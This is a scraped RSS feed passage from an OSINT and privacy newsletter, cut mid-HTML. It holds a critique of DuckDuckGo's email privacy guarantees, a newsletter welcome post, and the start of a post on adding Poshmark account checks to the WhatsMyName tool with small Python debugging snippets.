https://substackcdn.com/image/fetch/$s_!8Exp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 1272w, https://substackcdn.com/image/fetch/$s_!8Exp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8Exp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png" width="850" height="340" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:340,&quot;width&quot;:850,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:88889,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8Exp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 424w, https://substackcdn.com/image/fetch/$s_!8Exp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 848w, https://substackcdn.com/image/fetch/$s_!8Exp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 1272w, https://substackcdn.com/image/fetch/$s_!8Exp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Screenshot of the language used on DuckDuckGo&#8217;s parent company&#8217;s site</figcaption></figure></div><p>The Email Tracker Removal service is the one that I am most concerned with. Maybe I am too pessimistic, but I feel like DuckDuckGo is over-emphasizing the word "save." "Not saving" is only saying that nothing is directly left behind, which is a rather strange semantic point. Their stance on "not saving" is not much different from running <a href="https://en.wikipedia.org/wiki/Natural_language_processing">Natural Language Processing (NLP)</a> algorithms across the bodies of the emails or something similar. Someone can do a lot with a file (such as an email) without saving it. <strong>Maybe my worldview is too dystopian.</strong></p><p>I like <a href="https://duckduckgo.com/">DuckDuckGo</a>&#8217;s search engine, but without any inside or direct knowledge of their service/product, I am inclined to suspect that there are other motives at play here that aren't quite apparent yet. As with any company, DuckDuckGo can only go so long doing things out of "the goodness of their hearts" without *something* from users in return.</p><blockquote><p><strong>Most importantly, how will DuckDuckGo apply this to End to End Encrypted (E2E) emails?</strong></p></blockquote><p>Before thoroughly reading their press release, I was going to ask, "should we trust them with our private keys to be able to decrypt emails to remove any trackers in the body?"</p><p>But I now see that this is an email forwarding service. Does DuckDuckGo plan on monetizing the statistics from inbounds? They say that they're not reading emails, but how can they entirely remove all trackers without SOME level of parsing? Parsing would require a human or automated process to "read" the body and any attachments.</p><p>Reading the <a href="https://duckduckgo.com/email/privacy-guarantees">DuckDuckGo Privacy Guarantees</a>, I may be going too deep into this, but their chosen phrasing is questionable, that&#8217;s for sure.</p><h3>1. "We do not save your emails." </h3><p>Privacy Guarantee doesn't mention reading (whether by human or code) and anything prohibiting any analysis - whether analyzing the text, content, or sender/recipient. Stating that something is not saved is different from saying that it is &#8220;Zero-Knowledge&#8221; or not read, analyzed, or otherwise manipulated. I get that the point of the service is not &#8220;Zero-Knowledge.&#8221; Still, a lot of the userbase of DuckDuckGo is more privacy-focused than the "average bear," and the company has massively embraced this as part of its overall marketing strategy.</p><h3>2. "When using this service, the only personal information we save is your forwarding email address and the duck addresses you create." </h3><p>I don't see a whole lot wrong with this. Given what this service is and how it works, this would be a requirement for it to work, but it also reduces a user's privacy posture in that it could be another data point to be "requested" via legal processes. </p><p><strong>It is also important to note that DuckDuckGo is based in Paoli, PA, per the footer of their <a href="https://duckduckgo.com/about">About page</a>. </strong>This location presents privacy concerns in and of itself in contrast to mail services outside the US and the 5, 9, and 14 eyes countries and cooperators like <a href="https://tutanota.com/">Tutanota</a> and <a href="http://protonmail.com/">ProtonMail</a>. </p><h3>3. "We do not use your personal information for advertising or any other purposes unrelated to this service." </h3><p>Aside from identifiers like name, email address, and IP address, what are they defining as "personal information?" This statement is something that seems to be deliberately vague and likely up to varied legal interpretations.</p><h3>4. "We will only disclose personal information if we are legally forced to do so, and we will go to court to fight against such disclosure." </h3><p>This statement is kind of addressed in the <a href="https://duckduckgo.com/privacy">Privacy Policy for DDG</a> in general (since one is not available for the Email Tracker Removal service itself at this time). Per the privacy policy for the search engine, DuckDuckGo doesn&#8217;t use cookies by default, but searches are stored and in some cases, affiliate links are added to search results for a commission.  While the aforementioned statement is geared to the search engine, would DuckDuckGo do the same to the content of emails? I think in the absence of a more comprehensive statement or policy, the jury is out on this one.</p><h3>5. "We do not use third-party email services to forward your email." </h3><p>Cool, but has anyone audited these claims? Does the software that runs the service use any external libraries? This is undoubtedly an instance where I would like to see audit results or a pen test report. Building your own software can be rewarding but is not without its own plethora of issues. </p><h3>6. "We protect our infrastructure and your personal information with strict technical and organizational controls." </h3><p>This passage in the policy primarily addresses encryption and agreements with data processors. I would venture to guess that this may be on par with other search engines, but I need more information and context before feeling comfortable routing email through this.</p><h3>7 &amp; 8. Deals with support and account deletion requests. </h3><p>Nothing to say about these points. Seems fine.</p><h3>9. "We will not allow an ownership change to weaken these privacy guarantees." </h3><p>This statement looks excellent on paper but is not enforceable AFTER a sales transaction is complete.</p><p>Finally, the Email Tracker removal Service seems to require a mobile application. While not all mobile applications are evil, as we have observed with other platforms (namely social media), they do tend to collect "anonymized" data from user devices. I have a certain level of skepticism for this claim, and (maybe it's my inner conspiracy theorist speaking, but) it does make my "spidey senses" tingle a bit.</p><h1>Conclusion</h1><p>In theory, these new services from DuckDuckGo seem to be decent enough services, but I do not fully trust the provided information given the context. I think that further clarification is required. Given that these are <strong>free</strong> services, the old adage probably applies:</p><blockquote><p><em><strong>If you aren't paying for the product, you ARE the product.</strong></em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dRQS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dRQS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 424w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 848w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 1272w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dRQS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png" width="420" height="300" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/b2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:300,&quot;width&quot;:420,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:31264,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dRQS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 424w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 848w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 1272w, https://substackcdn.com/image/fetch/$s_!dRQS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Open Source Intelligence, OPSEC/Privacy, Disinformation, and Data Science and the impacts they have on society.]]></title><description><![CDATA[Welcome to The OSINTion Tidbit by me, Joe Gray.]]></description><link>https://tidbit.theosintion.com/p/coming-soon</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/coming-soon</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Fri, 04 Dec 2020 20:12:53 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!v8Rt!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F25f3dc9f-fdc6-436f-bba0-ba78284de737_400x400.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Welcome to The OSINTion Tidbit by me, Joe Gray. Joe is passionate about exploring Open Source Intelligence, Privacy, Disinformation, and Data Science and the impacts they have on society.</p><p>Sign up now so you don&#8217;t miss the first issue.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://tidbit.theosintion.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://tidbit.theosintion.com/subscribe?"><span>Subscribe now</span></a></p><p>In the meantime, <a href="https://tidbit.theosintion.com/p/coming-soon?utm_source=substack&utm_medium=email&utm_content=share&action=share">tell your friends</a>!</p>]]></content:encoded></item><item><title><![CDATA[New Threads, New OSINT — An exploration of Poshmark]]></title><description><![CDATA[I was tossing around ideas for a blog about Poshmark, and my first inclination was to check Micah Hoffman&#8217;s WhatsMyName tool (also&#8230;]]></description><link>https://tidbit.theosintion.com/p/new-threads-new-osint-an-exploration-of-poshmark-666291b959ec</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/new-threads-new-osint-an-exploration-of-poshmark-666291b959ec</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Tue, 25 Aug 2020 13:01:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!RPe6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RPe6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RPe6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 424w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 848w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 1272w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RPe6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RPe6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 424w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 848w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 1272w, https://substackcdn.com/image/fetch/$s_!RPe6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c47ece2-be82-45d9-aef9-7337a82d43d6_800x363.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>I was tossing around ideas for a blog about Poshmark. My first inclination was to check <a href="https://twitter.com/WebBreacher">Micah Hoffman&#8217;s</a> <a href="https://github.com/WebBreacher/WhatsMyName">WhatsMyName</a> tool (also available as Profiler in <a href="https://github.com/lanmaster53/recon-ng">Recon-ng</a> and as a <a href="https://whatsmyname.app/">Web Application</a>). The tool had no support for Poshmark. I am a curious person, and I like to give back to the community. So, naturally, I thought about how I could automate the checks for the closet&#8217;s existence. <strong>Note: Closet is the term Poshmark uses for sellers and their available inventory.</strong></p><p><em><strong>Another note: 100% of these techniques are UNAUTHENTICATED. When doing the same analysis with a logged-in account, nothing changes.</strong></em></p><h3>Building the Automation</h3><h4>Initial Scenario</h4><p>I use WhatsMyName quite frequently, so I am familiar with the general way that the application works. Sites are assembled in a JSON file that the Python script iterates over and does the checks for the sites, minding the HTTP code (200, 300, 404, etc.) and a string that is displayed in the response if an account exists or not. The script will then display on the screen whether it exists or not.<br>My downfall is that I was not intimately familiar with where to get the strings to verify the existence or conclude a lack of existence. To accomplish this, I copied the original WhatsMyName Python script (<code>web_accounts_list_checker.py</code>). I read through the code to the point where I found where the script&#8217;s logic checks for the code and the string. The part of the code where this occurs is around line 209 and reads as:</p><pre><code># Analyze the responses against what they should becode_match = r.status_code == int(site[&#8216;account_existence_code&#8217;])string_match = r.text.find(site[&#8216;account_existence_string&#8217;]) &gt;= 0</code></pre><h4>Finding Strings for Verification</h4><p>I added another line to print the output of the variable r to see what is returned:</p><pre><code># Analyze the responses against what they should becode_match = r.status_code == int(site['account_existence_code'])string_match = r.text.find(site['account_existence_string']) &gt;= 0print(r.text)</code></pre><p>I searched around the site for accounts that did and did not exist (Hello Bob, Alice, and C_3PJoe). Once I determined which ones existed and did not, I reran the code. Here is the censored output of a valid user:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Q9eW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Q9eW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 424w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 848w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 1272w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Q9eW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Q9eW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 424w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 848w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 1272w, https://substackcdn.com/image/fetch/$s_!Q9eW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F28aaed60-1d38-41fe-a74e-47aa51433be9_687x369.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Here is the censored output of a non-existent user:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!J4af!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!J4af!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 424w, https://substackcdn.com/image/fetch/$s_!J4af!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 848w, https://substackcdn.com/image/fetch/$s_!J4af!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 1272w, https://substackcdn.com/image/fetch/$s_!J4af!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!J4af!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/d21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 